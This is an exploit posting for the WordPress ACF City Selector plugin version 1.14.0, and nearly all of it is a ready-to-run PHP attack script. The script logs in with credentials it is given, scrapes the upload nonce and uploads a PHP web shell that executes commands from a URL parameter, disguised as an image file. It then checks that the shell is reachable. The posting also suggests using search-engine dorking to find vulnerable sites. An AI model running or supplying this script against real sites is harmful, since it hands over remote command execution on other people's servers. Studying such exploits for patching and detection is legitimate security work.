=============================================================================================================================================
| # Title     : WordPress ACF City Selector plugin versions 1.14.0 Code Injection Vulnerability                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/acf-city-selector/#developers                                                                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] vulnerability found in WordPress ACF City Selector plugin versions 1.14.0 & suffers from a remote shell upload vulnerability.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php <URL>  <USERNAME> <PASSWORD>

[+] PayLoad :

<?php
error_reporting(0);

function curl_request($url, $post = null, $headers = []) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");

    if ($post !== null) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }

    if (!empty($headers)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    }

    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

function get_plugin_version($url) {
    $version_url = "$url/wp-content/plugins/acf-city-selector/readme.txt";
    $response = curl_request($version_url);
    if ($response && preg_match('/Stable tag:\s*(\d+\.\d+\.\d+)/', $response, $matches)) {
        echo "[+] Detected plugin version: {$matches[1]}\n";
        return $matches[1];
    }
    echo "[-] Failed to extract version. Exiting.\n";
    exit();
}

function login_to_wordpress($url, $username, $password) {
    $login_url = "$url/wp-login.php";
    $data = [
        'log' => $username,
        'pwd' => $password,
        'rememberme' => 'forever',
        'wp-submit' => 'Log In'
    ];
    
    $response = curl_request($login_url, http_build_query($data), [
        "Content-Type: application/x-www-form-urlencoded"
    ]);

    return strpos($response, 'dashboard') !== false;
}

function extract_nonce($url) {
    $dashboard_url = "$url/wp-admin/options-general.php?page=acfcs-dashboard";
    $response = curl_request($dashboard_url);

    if (preg_match('/<input name="acfcs_upload_csv_nonce" type="hidden" value="(.*?)"/', $response, $matches)) {
        echo "[+] Extracted nonce: {$matches[1]}\n";
        return $matches[1];
    }
    echo "[-] Failed to extract nonce value.\n";
    exit();
}

function upload_shell($url, $nonce) {
    $shell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
    $upload_url = "$url/wp-admin/options-general.php?page=acfcs-dashboard";

    $post_fields = [
        'acfcs_upload_csv_nonce' => $nonce,
        'acfcs_csv_upload' => new CURLFile('shell.php', 'image/jpeg', 'indoushka.php')
    ];

    file_put_contents('shell.php', $shell);
    
    curl_request($upload_url, $post_fields, [
        "Content-Type: multipart/form-data"
    ]);
    
    $shell_url = "$url/wp-content/uploads/acfcs/indoushka.php";
    if (curl_request($shell_url)) {
        echo "[+] Shell uploaded successfully: $shell_url\n";
    } else {
        echo "[-] Shell upload failed.\n";
    }
}

function main($url, $username, $password) {
    $plugin_version = get_plugin_version($url);
    if (version_compare($plugin_version, '1.14.0', '<=')) {
        echo "[+] Vulnerable version detected! Proceeding with exploitation.\n";
        if (login_to_wordpress($url, $username, $password)) {
            $nonce_value = extract_nonce($url);
            upload_shell($url, $nonce_value);
        } else {
            echo "[-] Failed to log in.\n";
        }
    } else {
        echo "[-] Plugin is not vulnerable. Exiting.\n";
        exit();
    }
}

if ($argc < 4) {
    echo "Usage: php script.php <url> <username> <password>\n";
    exit();
}
main($argv[1], $argv[2], $argv[3]);
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================